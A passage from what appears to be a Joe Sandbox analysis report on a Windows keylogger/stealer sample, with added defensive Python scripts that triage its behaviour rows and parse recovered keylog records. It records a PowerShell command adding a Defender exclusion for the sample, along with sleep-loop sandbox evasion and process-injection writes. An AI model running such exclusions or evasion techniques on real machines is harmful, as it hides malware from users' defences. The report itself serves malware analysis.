Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
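The sleep rows and the evasion rows above read better together than one at a time. The sleep requests start at 2400000 ms (40 minutes, far past the report's own 3-minute bar) and then shrink by roughly 110 ms per call; that stepping is consistent with a loop that recomputes the remaining wait from the wall clock each time a sleep returns, so a sandbox that merely skips sleeps is simply asked again. The value 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10000), i.e. a request to wait forever. The Defender exclusion is added for a path under the user's profile, and the 4D5A ("MZ") write at base 400000 into a process with the sample's own image path is the PE-image write behind the injection signature. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the layout used on this page (and the run-together export with a trailing "Jump to behavior") and turns them into those findings. SAMPLE_ROWS is constructed from this section; the under-one-second step size and the list of user-writable directories are assumptions chosen for illustration.

```python
"""Triage of Joe Sandbox behaviour rows ("Source: <process> | <detail>").

Added example, not part of the report. SAMPLE_ROWS is constructed from entries
in this section; thresholds and the user-writable directory list are assumptions.
"""
import re
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10_000 ticks per ms):
# a request to wait forever, as reported for ctsdvwT.exe above.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000                    # the report's own ">= 3 min" bar
STEP_MAX_MS = 1000                               # assumption: a countdown step is under 1 s
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")  # assumption

# Accepts "Source: <src> | <detail>" as well as the run-together page export
# ("...exeThread delayed: ..."), with or without a trailing "Jump to behavior".
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>\S.*?\.exe)\s*(?:\|\s*)?"
    r"(?P<kind>Thread delayed|Process created|Memory written|Process token adjusted)"
    r":\s*(?P<detail>.*?)\s*(?:Jump to behavior)?$"
)
EXCLUSION_RE = re.compile(r'Add-MpPreference\b.*?-ExclusionPath\s+"([^"]+)"', re.I)
PE_WRITE_RE = re.compile(
    r"^(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+)$"
)


def parse_row(line):
    """Return (source, kind, detail) or None for rows this triage ignores."""
    m = ROW_RE.match(line.strip())
    return (m["src"], m["kind"], m["detail"].strip()) if m else None


def summarize_sleeps(values):
    """Characterise one process's sleep requests (milliseconds, in report order)."""
    finite = [v for v in values if v != TIMESPAN_MAX_MS]
    steps = [a - b for a, b in zip(finite, finite[1:])]
    small = sum(1 for s in steps if 0 < s < STEP_MAX_MS)
    return {
        "requests": len(values),
        "infinite_requests": values.count(TIMESPAN_MAX_MS),
        "longest_finite_ms": max(finite, default=0),
        "total_finite_ms": sum(finite),
        "long_sleep": max(finite, default=0) >= LONG_SLEEP_MS,
        # Successive requests shrinking by well under a second: a loop that
        # recomputes the remaining wait from the clock after each (skipped) sleep.
        "countdown_loop": len(steps) >= 3 and small >= 0.8 * len(steps),
    }


def analyze(rows):
    sleeps, findings = defaultdict(list), []
    for line in rows:
        parsed = parse_row(line)
        if parsed is None:
            continue
        src, kind, detail = parsed
        if kind == "Thread delayed":
            m = re.search(r"delay time:\s*(\d+)", detail)
            if m:
                sleeps[src].append(int(m.group(1)))
        elif kind == "Process created":
            m = EXCLUSION_RE.search(detail)
            if m:
                path = m.group(1)
                findings.append({"type": "defender_exclusion", "source": src, "path": path,
                                 "user_writable": any(d in path.lower() for d in USER_WRITABLE)})
        elif kind == "Memory written":
            m = PE_WRITE_RE.match(detail)
            if m and m["magic"].upper().startswith("4D5A"):   # "MZ": a PE image, not data
                findings.append({"type": "pe_image_written", "source": src, "target": m["target"],
                                 "base": int(m["base"], 16),
                                 "same_image": m["target"].lower() == src.lower()})
        elif kind == "Process token adjusted" and detail.lower().startswith("debug"):
            findings.append({"type": "debug_privilege", "source": src})
    return {"sleeps": {s: summarize_sleeps(v) for s, v in sleeps.items()}, "findings": findings}


SAMPLE_ROWS = [  # constructed from rows in this section
    r"Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Thread delayed: delay time: 2397389",
    r"Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Thread delayed: delay time: 2397281",
    r"Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Thread delayed: delay time: 2397171",
    r"Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Thread delayed: delay time: 2397059",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2400000",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399874",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399766",
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399656",
    r"Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process token adjusted: Debug",
    r'Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"',
    r"Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Memory written: C:\Users\user\Desktop\Eschemyquote24573j33.exe base: 400000 value starts with: 4D5A",
    # run-together form as exported from the report page, also accepted
    r"Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5A",
]

if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_ROWS), indent=2))
```

Run it on the full row list of a report to get one sleep summary per process plus a findings list; a process whose summary shows both a long sleep and a countdown loop needs the analysis clock advanced, not just its sleeps skipped, before the later behaviour will appear. The same-image check only says the write target carries the sample's own path; on this page that target is the suspended child from the Process created rows above, which the report identifies by path alone.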
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]q?<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}rTHbq@N7
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR]q<
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]q8<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}THbq@N7
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmp, Eschemyquote24573j33.exe, 00000004.00000002.4509927352.000000000337D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Time: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}r
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR]q
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]q9<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}rTHbq@N7
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Time: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}rTe]q
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]q><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}THbq@N7
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]q3<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: @\]qDTime: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}r
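The memory strings above are fragments of one HTML-formatted keylog record: a header of machine facts (Time, User Name, Computer Name, OSFullName, CPU, RAM) separated by <br>, an <hr>, then per-window entries of the form <b>[ title]</b> (timestamp)<br> followed by the keystrokes captured in that window, with special keys written as {Win}. Several copies are cut off or carry adjacent heap bytes ("$]q?", "THbq@N7"), as is usual for strings scraped from a dump. The parser below is an added example, not part of the report or of the malware: it recovers the header fields and the window entries from such a record so the capture can be read without the markup. SAMPLE_RECORD and SAMPLE_FRAGMENT are constructed from the strings in this section; treating each {...} run as one special-key token is an assumption about the format.

```python
"""Parser for the HTML keylog records recovered from memory above.

Added example, not part of the report. SAMPLE_RECORD and SAMPLE_FRAGMENT are
constructed from the memory strings in this section; reading every "{...}"
run as one special-key token is an assumption about the format.
"""
import re
from html import unescape

# Field order seen in the recovered header, before the <hr> separator.
HEADER_FIELDS = ("Time", "User Name", "Computer Name", "OSFullName", "CPU", "RAM")

# One per-window entry: <b>[ title]</b> (timestamp)<br> followed by keystrokes
# up to the next entry or the end of the record.
ENTRY_RE = re.compile(
    r"<b>\[\s*(?P<title>.*?)\]</b>\s*\((?P<when>[^)]*)\)<br>(?P<keys>.*?)(?=<b>\[|$)", re.S)
TOKEN_RE = re.compile(r"\{[^{}]+\}|.", re.S)     # "{Win}" is one token, anything else one char


def parse_header(header_html):
    """'Key: Value<br>Key: Value<br>...' into a dict; values may contain colons."""
    fields = {}
    for part in header_html.split("<br>"):
        if ":" in part:
            key, value = part.split(":", 1)
            fields[key.strip()] = unescape(value.strip())
    return fields


def tokenize_keys(keys_html):
    """Split captured keystrokes into special-key tokens and single characters."""
    return TOKEN_RE.findall(unescape(keys_html.replace("<br>", "\n")))


def parse_record(record_html):
    head, sep, body = record_html.partition("<hr>")
    header = parse_header(head) if sep else {}
    entries = []
    for m in ENTRY_RE.finditer(body if sep else record_html):
        tokens = tokenize_keys(m["keys"])
        entries.append({
            "window": m["title"].strip(),
            "when": m["when"].strip(),      # kept as text; see the note on date formats
            "tokens": tokens,
            "special": [t for t in tokens if t.startswith("{")],
            "typed": "".join(t for t in tokens if not t.startswith("{")),
        })
    return {"header": header, "entries": entries,
            "header_complete": all(f in header for f in HEADER_FIELDS)}


# Constructed from the complete string in this section.
SAMPLE_RECORD = (
    "Time: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>"
    "OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>"
    "RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}r"
)
# Constructed from one of the truncated copies: no header, no keystrokes yet.
SAMPLE_FRAGMENT = "<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>"

if __name__ == "__main__":
    import json
    print(json.dumps(parse_record(SAMPLE_RECORD), indent=2))
    print(json.dumps(parse_record(SAMPLE_FRAGMENT), indent=2))
```

Two caveats when using this on real captures. The header Time (11/19/2024) is month/day/year while the window timestamp (26/09/2024) is day/month/year, so the parser leaves both as text; normalise each field with its own format before correlating with other telemetry. Trailing bytes such as THbq@N7 on the truncated copies come out as typed text; confirm against the containing dump before treating them as keystrokes rather than adjacent heap content.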
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Users\user\Desktop\Eschemyquote24573j33.exe VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Users\user\Desktop\Eschemyquote24573j33.exe VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match; File source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 320, type: MEMORYSTR
